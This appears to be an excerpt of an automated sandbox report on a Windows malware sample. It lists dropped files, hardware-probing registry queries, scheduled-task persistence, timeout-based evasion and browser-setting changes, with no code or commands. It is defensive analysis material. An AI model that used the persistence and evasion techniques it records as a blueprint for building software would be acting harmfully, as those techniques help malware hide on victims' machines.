File created C:\Program Files (x86)\UltraMediaBurner\is-2D9OV.tmp C:\Users\Admin\AppData\Local\Temp\is-BDIR4.tmp\ultramediaburner.tmp N/A
File created C:\Program Files (x86)\AW Manager\Windows Manager\Uninstall.lnk C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Microsoft.NET\Jixaevaexiry.exe C:\Users\Admin\AppData\Local\Temp\is-JQ7NE.tmp\46807GHF____.exe N/A
File created C:\Program Files (x86)\UltraMediaBurner\is-VPND7.tmp C:\Users\Admin\AppData\Local\Temp\is-BDIR4.tmp\ultramediaburner.tmp N/A
File created C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.ini C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\MSBuild\GNSNPOGKSY\ultramediaburner.exe.config C:\Users\Admin\AppData\Local\Temp\is-JQ7NE.tmp\46807GHF____.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\MSID37.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2274612954.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp C:\Windows\SysWOW64\WerFault.exe N/A
File opened for modification C:\Windows\Debug\ESE.TXT C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
File created C:\Windows\Installer\f74eab4.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIEE3E.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2274612954.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2274612954.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File opened for modification C:\Windows\Installer\MSI1306.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI1C42.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI203E.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF2E4.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF363.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI1D2E.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI1E58.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI20AC.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI2419.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF208.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF324.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62} C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI1B67.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2274612954.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2274612954.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2274612954.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2274612954.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File opened for modification C:\Windows\Installer\MSIF3B2.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF286.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI10E2.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI150C.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2274612954.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f74eab7.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f74eab4.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIF7A.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI1F33.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2274612954.pri C:\Windows\Explorer.EXE N/A
File opened for modification C:\Windows\Installer\MSI14DC.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\rescache\_merged\3720402701\2274612954.pri C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\ffebvvt N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\ffebvvt N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\ffebvvt N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\ffebvvt N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\ffebvvt N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\ffebvvt N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat19c6762a08beae.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat19c6762a08beae.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\ffebvvt N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\ffebvvt N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat19c6762a08beae.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Roaming\ffebvvt N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat19e6a852f849bb2.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\0a5fa132-bc13-4f09-8ac8-a255db3f0598\build2.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\0a5fa132-bc13-4f09-8ac8-a255db3f0598\build2.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\4EE1.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\4EE1.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\svchost.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat19e6a852f849bb2.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\OneDrive.exe = "11000" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\system32\browser_broker.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\system32\svchost.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\16\52C64B7E C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Windows\system32\svchost.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\system32\svchost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache C:\Windows\system32\svchost.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\system32\svchost.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\system32\svchost.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\system32\svchost.exe N/A

Modifies registry class

Description Indicator Process Target
Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\WOW6432NODE\INTERFACE\{5D65DD0D-81BF-4FF4-AEEA-6EFFB445CB3F}\PROXYSTUBCLSID32 C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{0d4e4444-cb20-4c2b-b8b2-94e5656ecae8} C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{79A2A54C-3916-41FD-9FAB-F26ED0BBA755}\TypeLib\Version = "1.0" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\VersionIndependentProgID\ = "SyncEngineFileInfoProvider.SyncEngineFileInfoProvider" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{5999E1EE-711E-48D2-9884-851A709F543D}\LocalServer32 C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\TypeLib\{909A6CCD-6810-46C4-89DF-05BE7EB61E6C}\1.0\0\win32 C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{917E8742-AA3B-7318-FA12-10485FB322A2}\ProgID C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Roaming C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{82CA8DE3-01AD-4CEA-9D75-BE4C51810A9E}\InprocServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\21.160.0808.0002\\FileSyncShell.dll" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{AEEBAD4E-3E0A-415B-9B94-19C499CD7B6A}\TypeLib C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "Microsoft" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\SettingsVersion = "2" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\WOW6432NODE\INTERFACE\{F0440F4E-4884-4A8F-8A45-BA89C00F96F2}\PROXYSTUBCLSID32 C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{b5c25645-7426-433f-8a5f-42b7ff27a7b2}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "Male" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\www.mcafee.com C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "763" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\WOW6432NODE\INTERFACE\{AF60000F-661D-472A-9588-F062F6DB7A0E}\PROXYSTUBCLSID32 C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\CLSID\{5AB7172C-9C11-405C-8DD5-AF20F3606282} C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{869BDA08-7ACF-42B8-91AE-4D8D597C0B33}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\NucleusNativeMessaging.NucleusNativeMessaging.1\CLSID C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\odopen\UseOriginalUrlEncoding = "1" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\SignaturePolicy = 06000000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\INTERFACE\{0F872661-C863-47A4-863F-C065C182858A}\TYPELIB C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{390AF5A7-1390-4255-9BC9-935BFCFA5D57} C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{C2FE84F5-E036-4A07-950C-9BFD3EAB983A}\ = "IGetSpaceUsedCallback" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{1B71F23B-E61F-45C9-83BA-235D55F50CF9}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\www.mcafee.com\ = "41" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{20894375-46AE-46E2-BAFD-CB38975CDCE6}\InprocServer32\ThreadingModel = "Apartment" C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{50487D09-FFA9-45E1-8DF5-D457F646CD83}\ProxyStubClsid32 C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{f0440f4e-4884-4a8F-8a45-ba89c00f96f2}\ProxyStubClsid32 C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{1b7aed4f-fcaf-4da4-8795-c03e635d8edc}\ProxyStubClsid32 C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{c1439245-96b4-47fc-b391-679386c5d40f}\TypeLib C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{AEEBAD4E-3E0A-415B-9B94-19C499CD7B6A}\ProxyStubClsid32 C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A} C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key deleted \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{53de12aa-df96-413d-a25e-c75b6528abf2} C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\WOW6432Node\Interface\{2692D1F2-2C7C-4AE0-8E73-8F37736C912D}\TypeLib C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "SpeechUXPlugin" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaV = "MS-1033-110-WINMO-DNN" C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe N/A
